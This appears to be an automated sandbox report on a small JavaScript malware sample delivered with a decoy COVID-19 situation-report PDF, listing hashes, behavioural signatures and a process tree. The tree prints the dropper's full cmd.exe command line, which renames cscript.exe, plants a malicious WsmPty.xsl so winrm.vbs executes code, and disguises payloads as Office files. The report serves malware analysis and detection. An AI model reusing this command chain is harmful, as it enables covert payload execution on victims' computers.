Overview
overview
8Static
static
420200308-s...19.pdf
windows7_x64
120200308-s...19.pdf
windows10-2004_x64
83UDBUTNY7YstRc.dll
windows7_x64
13UDBUTNY7YstRc.dll
windows10-2004_x64
8486AULMsOPmf6W.exe
windows7_x64
1486AULMsOPmf6W.exe
windows10-2004_x64
89sOXN6Ltf0afe7.js
windows7_x64
89sOXN6Ltf0afe7.js
windows10-2004_x64
8cSi1r0uywDNvDu.xml
windows7_x64
1cSi1r0uywDNvDu.xml
windows10-2004_x64
8Analysis
-
max time kernel
149s -
max time network
159s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220112 -
submitted
01-02-2022 02:34
Behavioral task
behavioral1
Sample
20200308-sitrep-48-covid-19.pdf
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
20200308-sitrep-48-covid-19.pdf
Resource
win10v2004-en-20220113
Behavioral task
behavioral3
Sample
3UDBUTNY7YstRc.dll
Resource
win7-en-20211208
Behavioral task
behavioral4
Sample
3UDBUTNY7YstRc.dll
Resource
win10v2004-en-20220113
Behavioral task
behavioral5
Sample
486AULMsOPmf6W.exe
Resource
win7-en-20211208
Behavioral task
behavioral6
Sample
486AULMsOPmf6W.exe
Resource
win10v2004-en-20220112
Behavioral task
behavioral7
Sample
9sOXN6Ltf0afe7.js
Resource
win7-en-20211208
Behavioral task
behavioral8
Sample
9sOXN6Ltf0afe7.js
Resource
win10v2004-en-20220112
Behavioral task
behavioral9
Sample
cSi1r0uywDNvDu.xml
Resource
win7-en-20211208
Behavioral task
behavioral10
Sample
cSi1r0uywDNvDu.xml
Resource
win10v2004-en-20220112
General
-
Target
9sOXN6Ltf0afe7.js
-
Size
792B
-
MD5
4f8ff5e70647dbc5d91326346c393729
-
SHA1
2fd4eb78e53af6a5b210943ca8f0e521bb567afb
-
SHA256
70b8397f87e4a0d235d41b00a980a8be9743691318d30293f7aa6044284ffc9c
-
SHA512
70befa1aaebca808fab2f3538897380b8ad988106eab300dfe4063e1a6933ce77ff01949f99e5741ac8ffb0653e65b946de4f87e5a035926b18bfb3e5e4ec2ef
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
Processes:
msproof.exepid process 3364 msproof.exe -
Sets service image path in registry 2 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
wscript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation wscript.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
msedge.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe -
Drops file in Program Files directory 2 IoCs
Processes:
setup.exedescription ioc process File created C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\cdd847f2-16a4-4b25-90c4-cf6140897f3b.tmp setup.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20220201033709.pma setup.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
msedge.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies data under HKEY_USERS 41 IoCs
Processes:
WaaSMedicAgent.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs WaaSMedicAgent.exe -
Modifies registry class 1 IoCs
Processes:
msedge.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 10 IoCs
Processes:
msedge.exemsedge.exeidentity_helper.exemsedge.exepid process 2500 msedge.exe 2500 msedge.exe 1152 msedge.exe 1152 msedge.exe 4904 identity_helper.exe 4904 identity_helper.exe 4036 msedge.exe 4036 msedge.exe 4036 msedge.exe 4036 msedge.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
Processes:
msedge.exepid process 1152 msedge.exe 1152 msedge.exe 1152 msedge.exe 1152 msedge.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
msedge.exepid process 1152 msedge.exe 1152 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
wscript.execmd.exemsedge.exedescription pid process target process PID 1800 wrote to memory of 1292 1800 wscript.exe cmd.exe PID 1800 wrote to memory of 1292 1800 wscript.exe cmd.exe PID 1292 wrote to memory of 3364 1292 cmd.exe msproof.exe PID 1292 wrote to memory of 3364 1292 cmd.exe msproof.exe PID 1292 wrote to memory of 1200 1292 cmd.exe PING.EXE PID 1292 wrote to memory of 1200 1292 cmd.exe PING.EXE PID 1292 wrote to memory of 1152 1292 cmd.exe msedge.exe PID 1292 wrote to memory of 1152 1292 cmd.exe msedge.exe PID 1152 wrote to memory of 3540 1152 msedge.exe msedge.exe PID 1152 wrote to memory of 3540 1152 msedge.exe msedge.exe PID 1152 wrote to memory of 3272 1152 msedge.exe msedge.exe PID 1152 wrote to memory of 3272 1152 msedge.exe msedge.exe PID 1152 wrote to memory of 3272 1152 msedge.exe msedge.exe PID 1152 wrote to memory of 3272 1152 msedge.exe msedge.exe PID 1152 wrote to memory of 3272 1152 msedge.exe msedge.exe PID 1152 wrote to memory of 3272 1152 msedge.exe msedge.exe PID 1152 wrote to memory of 3272 1152 msedge.exe msedge.exe PID 1152 wrote to memory of 3272 1152 msedge.exe msedge.exe PID 1152 wrote to memory of 3272 1152 msedge.exe msedge.exe PID 1152 wrote to memory of 3272 1152 msedge.exe msedge.exe PID 1152 wrote to memory of 3272 1152 msedge.exe msedge.exe PID 1152 wrote to memory of 3272 1152 msedge.exe msedge.exe PID 1152 wrote to memory of 3272 1152 msedge.exe msedge.exe PID 1152 wrote to memory of 3272 1152 msedge.exe msedge.exe PID 1152 wrote to memory of 3272 1152 msedge.exe msedge.exe PID 1152 wrote to memory of 3272 1152 msedge.exe msedge.exe PID 1152 wrote to memory of 3272 1152 msedge.exe msedge.exe PID 1152 wrote to memory of 3272 1152 msedge.exe msedge.exe PID 1152 wrote to memory of 3272 1152 msedge.exe msedge.exe PID 1152 wrote to memory of 3272 1152 msedge.exe msedge.exe PID 1152 wrote to memory of 3272 1152 msedge.exe msedge.exe PID 1152 wrote to memory of 3272 1152 msedge.exe msedge.exe PID 1152 wrote to memory of 3272 1152 msedge.exe msedge.exe PID 1152 wrote to memory of 3272 1152 msedge.exe msedge.exe PID 1152 wrote to memory of 3272 1152 msedge.exe msedge.exe PID 1152 wrote to memory of 3272 1152 msedge.exe msedge.exe PID 1152 wrote to memory of 3272 1152 msedge.exe msedge.exe PID 1152 wrote to memory of 3272 1152 msedge.exe msedge.exe PID 1152 wrote to memory of 3272 1152 msedge.exe msedge.exe PID 1152 wrote to memory of 3272 1152 msedge.exe msedge.exe PID 1152 wrote to memory of 3272 1152 msedge.exe msedge.exe PID 1152 wrote to memory of 3272 1152 msedge.exe msedge.exe PID 1152 wrote to memory of 3272 1152 msedge.exe msedge.exe PID 1152 wrote to memory of 3272 1152 msedge.exe msedge.exe PID 1152 wrote to memory of 3272 1152 msedge.exe msedge.exe PID 1152 wrote to memory of 3272 1152 msedge.exe msedge.exe PID 1152 wrote to memory of 3272 1152 msedge.exe msedge.exe PID 1152 wrote to memory of 3272 1152 msedge.exe msedge.exe PID 1152 wrote to memory of 3272 1152 msedge.exe msedge.exe PID 1152 wrote to memory of 3272 1152 msedge.exe msedge.exe PID 1152 wrote to memory of 2500 1152 msedge.exe msedge.exe PID 1152 wrote to memory of 2500 1152 msedge.exe msedge.exe PID 1152 wrote to memory of 1040 1152 msedge.exe msedge.exe PID 1152 wrote to memory of 1040 1152 msedge.exe msedge.exe PID 1152 wrote to memory of 1040 1152 msedge.exe msedge.exe PID 1152 wrote to memory of 1040 1152 msedge.exe msedge.exe PID 1152 wrote to memory of 1040 1152 msedge.exe msedge.exe PID 1152 wrote to memory of 1040 1152 msedge.exe msedge.exe PID 1152 wrote to memory of 1040 1152 msedge.exe msedge.exe PID 1152 wrote to memory of 1040 1152 msedge.exe msedge.exe PID 1152 wrote to memory of 1040 1152 msedge.exe msedge.exe PID 1152 wrote to memory of 1040 1152 msedge.exe msedge.exe PID 1152 wrote to memory of 1040 1152 msedge.exe msedge.exe PID 1152 wrote to memory of 1040 1152 msedge.exe msedge.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\9sOXN6Ltf0afe7.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1800 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c mkdir C:\Users\Admin\AppData\Local\Temp\cscript.exe&for /r C:\Windows\System32\ %m in (cscr*.exe) do copy %m C:\Users\Admin\AppData\Local\Temp\cscript.exe\msproof.exe /y&move /Y C:\Users\Admin\AppData\Local\Temp\cSi1r0uywDNvDu.tmp C:\Users\Admin\AppData\Local\Temp\cscript.exe\WsmPty.xsl&C:\Users\Admin\AppData\Local\Temp\cscript.exe\msproof.exe //nologo C:\Windows\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:pretty&del "C:\Users\Admin\OFFICE12\Wordcnvpxy.exe" /f /q&ping -n 1 127.0.0.1&move /Y C:\Users\Admin\AppData\Local\Temp\486AULMsOPmf6W.tmp "C:\Users\Admin\OFFICE12\MSOSTYLE.EXE"&move /Y C:\Users\Admin\AppData\Local\Temp\3UDBUTNY7YstRc.tmp "C:\Users\Admin\OFFICE12\OINFO12.OCX"© /b C:\Users\Admin\AppData\Local\Temp\2m7EBxdH3wHwBO.tmp+C:\Users\Admin\AppData\Local\Temp\MiZl5xsDRylf0W.tmp "C:\Users\Admin\OFFICE12\Wordcnvpxy.exe" /Y&"C:\Users\Admin\AppData\Local\Temp\20200308-sitrep-48-covid-19.pdf"2⤵
- Suspicious use of WriteProcessMemory
PID:1292 -
C:\Users\Admin\AppData\Local\Temp\cscript.exe\msproof.exeC:\Users\Admin\AppData\Local\Temp\cscript.exe\msproof.exe //nologo C:\Windows\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:pretty3⤵
- Executes dropped EXE
PID:3364
-
-
C:\Windows\system32\PING.EXEping -n 1 127.0.0.13⤵
- Runs ping.exe
PID:1200
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\20200308-sitrep-48-covid-19.pdf3⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1152 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fff157e46f8,0x7fff157e4708,0x7fff157e47184⤵PID:3540
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2376,12148746049252484603,15907242130056936346,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2400 /prefetch:24⤵PID:3272
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2376,12148746049252484603,15907242130056936346,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2456 /prefetch:34⤵
- Suspicious behavior: EnumeratesProcesses
PID:2500
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2376,12148746049252484603,15907242130056936346,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2752 /prefetch:84⤵PID:1040
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2376,12148746049252484603,15907242130056936346,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3836 /prefetch:14⤵PID:3248
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2376,12148746049252484603,15907242130056936346,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3488 /prefetch:14⤵PID:2236
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2376,12148746049252484603,15907242130056936346,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5296 /prefetch:84⤵PID:1676
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2376,12148746049252484603,15907242130056936346,131072 --disable-gpu-compositing --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5352 /prefetch:14⤵PID:3744
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --field-trial-handle=2376,12148746049252484603,15907242130056936346,131072 --lang=en-US --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --mojo-platform-channel-handle=6148 /prefetch:64⤵PID:2464
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2376,12148746049252484603,15907242130056936346,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2164 /prefetch:14⤵PID:4788
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2376,12148746049252484603,15907242130056936346,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6476 /prefetch:84⤵PID:4880
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2376,12148746049252484603,15907242130056936346,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6476 /prefetch:84⤵
- Suspicious behavior: EnumeratesProcesses
PID:4904
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings4⤵
- Drops file in Program Files directory
PID:4980 -
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff6c4eb5460,0x7ff6c4eb5470,0x7ff6c4eb54805⤵PID:5008
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2376,12148746049252484603,15907242130056936346,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5720 /prefetch:84⤵PID:4740
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2376,12148746049252484603,15907242130056936346,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2388 /prefetch:84⤵PID:3204
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2376,12148746049252484603,15907242130056936346,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3508 /prefetch:84⤵PID:4068
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2376,12148746049252484603,15907242130056936346,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3440 /prefetch:24⤵
- Suspicious behavior: EnumeratesProcesses
PID:4036
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p1⤵PID:3808
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3744
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe 0546a46c03aa5166ddcea45005bb37ed O/t/vqmvr0W6dqZWOuA7UQ.0.1.0.0.01⤵
- Modifies data under HKEY_USERS
PID:4392
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
24590bf74bbbbfd7d7ac070f4e3c44fd
SHA1cdfe517d07f18623778829aa98d6bbadd3f294cd
SHA256ae37fd1b642e797b36b9ffcec8a6e986732d011681061800c6b74426c28a9d03
SHA512ffaf2c86c9555513cdb51a7638f1fde3e8951a203aac63fd0aac62db297c853ac8c14e1a212c01d6b181df53e790f80489358489f6415d5c7fa53bfb8888bfa9
-
MD5
24590bf74bbbbfd7d7ac070f4e3c44fd
SHA1cdfe517d07f18623778829aa98d6bbadd3f294cd
SHA256ae37fd1b642e797b36b9ffcec8a6e986732d011681061800c6b74426c28a9d03
SHA512ffaf2c86c9555513cdb51a7638f1fde3e8951a203aac63fd0aac62db297c853ac8c14e1a212c01d6b181df53e790f80489358489f6415d5c7fa53bfb8888bfa9
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e